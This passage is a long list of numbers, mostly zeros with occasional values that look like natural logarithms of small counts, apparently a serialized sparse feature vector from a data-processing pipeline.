0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 7.973471367577775, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 3.2188758248682006, 0, 3.8005740880419454, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 3.8005740880419454, 0.0, 5.723585101952381, 0, 0.0, 0.0, \n 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 6.437751649736401, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 3.1354942159291497, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 3.2188758248682006, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 4.160336650881089, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.101797476893978, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 11.76620976334845, 0.0, 0.0, \n 0.0, 0, 0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 10.559023657635953, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 2.550898738446989, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.008260801089284, \n 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.877735781779639, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, \n 3.4339872044851467, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 2.833213344056216, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, \n 0.0, 3.649511027115099, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 4.06534854782536, 0.0,\n 5.545177444479562, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, \n 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 